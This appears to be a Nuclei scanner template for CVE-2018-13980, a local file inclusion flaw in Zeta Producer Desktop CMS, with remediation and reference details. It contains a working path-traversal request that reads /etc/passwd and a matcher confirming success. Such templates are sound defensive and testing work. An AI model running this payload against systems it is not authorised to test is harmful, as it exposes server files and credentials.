id: CVE-2018-13980 info: name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion author: wisnupramoedya severity: medium description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. impact: | An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/45016 - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2018-13980 cwe-id: CWE-22 epss-score: 0.0018 epss-percentile: 0.5505 cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeta-producer product: zeta_producer tags: cve,cve2018,lfi,edb,packetstorm,zeta-producer http: - method: GET path: - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022100fd3411082032af8bbb8b2257d19924985a982a9a8139579fcbba09b06005a8bd02206fcd7e7cf6ea345adecdd73ea79643aff0e5c5dc2e71ef38f9793dd9a3223432:922c64590222798bb761d5b6d8e72950